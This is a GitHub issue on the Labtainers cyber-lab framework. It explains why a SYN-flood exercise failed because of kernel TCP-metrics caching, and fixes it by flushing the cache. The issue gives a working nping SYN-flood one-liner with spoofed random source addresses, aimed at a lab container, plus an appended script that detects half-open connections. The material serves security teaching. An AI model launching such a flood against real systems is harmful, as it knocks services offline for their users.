mfthomps / Labtainers

Labtainers: A Docker-based cyber lab framework
https://nps.edu/web/c3o/labtainers

SYN Flooding Attack need `server:~$ sudo ip tcp_metrics flush` before starting #86

Open FrancoisCapon opened 1 year ago

FrancoisCapon commented 1 year ago

Hello,

I'm working on a lab based on Labtainers and I was a little frustrated because the SYN flood doesn't work: #29

The explanation and the solution are in SEED Labs – TCP/IP Attack Lab [page 6 Note A: A kernel mitigation mechanism], indeed:

However, if before the attack, machine X has already made a telnet (or TCP connection) to the victim machine, then X seems to be “immune” to the SYN flooding attack, and can successfully telnet to the victim machine during the attack. It seems that the victim machine remembers past successful connections, and uses this memory when establishing future connections with the “returning” client.

This behavior does not exist in Ubuntu 16.04 and earlier versions.

In fact the kernel of the VM has certainly been updated and must implement this mitigation:

server:~$ sudo apt install iproute2 # ip not available
server:~$ ip tcp_metrics show
172.25.0.3 age 1031.056sec cwnd 10 rtt 4029us rttvar 7890us source 172.25.0.2 <= server IP
# former user connection is "conserved" :-(
server:~$ sudo ip tcp_metrics flush
server:~$ ip tcp_metrics show
server:~$

attacker:~ watch --interval 0.1 sudo nping --tcp --flags syn -p 23 -c 1 172.25.0.2 --source-ip rand

server:~$ watch --interval 2 --differences netstat -nat
Every 2.0s: netstat -nat                                                    Thu Oct 26

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.11:42225        0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 172.25.0.2:23           1.134.109.34:48166      SYN_RECV
tcp        0      0 172.25.0.2:23           210.33.194.177:54812    SYN_RECV
tcp        0      0 172.25.0.2:23           55.108.41.133:24773     SYN_RECV
tcp        0      0 172.25.0.2:23           132.95.209.224:59345    SYN_RECV
tcp        0      0 172.25.0.2:23           218.56.26.233:36566     SYN_RECV
tcp        0      0 172.25.0.2:23           187.181.2.54:27882      SYN_RECV
tcp        0      0 172.25.0.2:23           171.15.164.8:51374      SYN_RECV
tcp        0      0 172.25.0.2:23           18.91.155.119:24214     SYN_RECV
tcp        0      0 172.25.0.2:23           248.63.6.223:16868      SYN_RECV
tcp6       0      0 :::21                   :::*                    LISTEN

user:~$ telnet 172.25.0.2
Trying 172.25.0.2... # TCP SYN backlog full :-)
telnet: Unable to connect to remote host: Connection timed out

SYN Flooding Attack Successful :trophy:
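To see from the server side whether the backlog is actually filling (the condition the `watch netstat -nat` loop above is eyeballing), here is an added example, not code from the issue author or from Labtainers, that counts half-open connections per local socket from `netstat -nat` output. It assumes the six-column `netstat -nat` layout quoted above and uses a constructed sample modelled on that output.

```shell
#!/bin/sh
# Added example (not from Labtainers or the issue): summarise SYN_RECV entries in
# `netstat -nat` output so a lab participant can tell a filling SYN backlog from
# ordinary traffic. Works with any POSIX awk; IPv4 addresses only.

# Constructed sample, modelled on the netstat output quoted in the issue.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 172.25.0.2:23           1.134.109.34:48166      SYN_RECV
tcp        0      0 172.25.0.2:23           210.33.194.177:54812    SYN_RECV
tcp        0      0 172.25.0.2:23           55.108.41.133:24773     SYN_RECV
tcp        0      0 172.25.0.2:22           10.0.0.5:40000          ESTABLISHED
tcp6       0      0 :::21                   :::*                    LISTEN'

# Read netstat -nat on stdin; print "<local socket> <count>" for every local
# socket that has SYN_RECV entries. Columns: proto recv-q send-q local foreign state.
count_syn_recv() {
    awk '$6 == "SYN_RECV" { n[$4]++ } END { for (k in n) print k, n[k] }' | sort
}

# Number of distinct source IPs in SYN_RECV for one local socket ($1).
# Many distinct sources against one port is the flood pattern (random
# spoofed sources, as with --source-ip rand) rather than one slow client.
distinct_syn_sources() {
    awk -v sock="$1" '
        $6 == "SYN_RECV" && $4 == sock { split($5, a, ":"); s[a[1]]++ }
        END { c = 0; for (k in s) c++; print c }'
}

# Print a WARN line for every local socket whose SYN_RECV count reaches $1.
# Typical use on the victim: netstat -nat | syn_backlog_alert 100
syn_backlog_alert() {
    count_syn_recv | awk -v t="$1" \
        '$2 >= t { print "WARN: " $2 " half-open connections on " $1 }'
}

# Stand-alone demo on the constructed sample.
printf '%s\n' "$SAMPLE_NETSTAT" | count_syn_recv
printf '%s\n' "$SAMPLE_NETSTAT" | syn_backlog_alert 3
```

Pair the WARN threshold with the listen backlog of the service under test; once the count sits at the backlog size, new clients get the `Connection timed out` seen in the telnet attempt above.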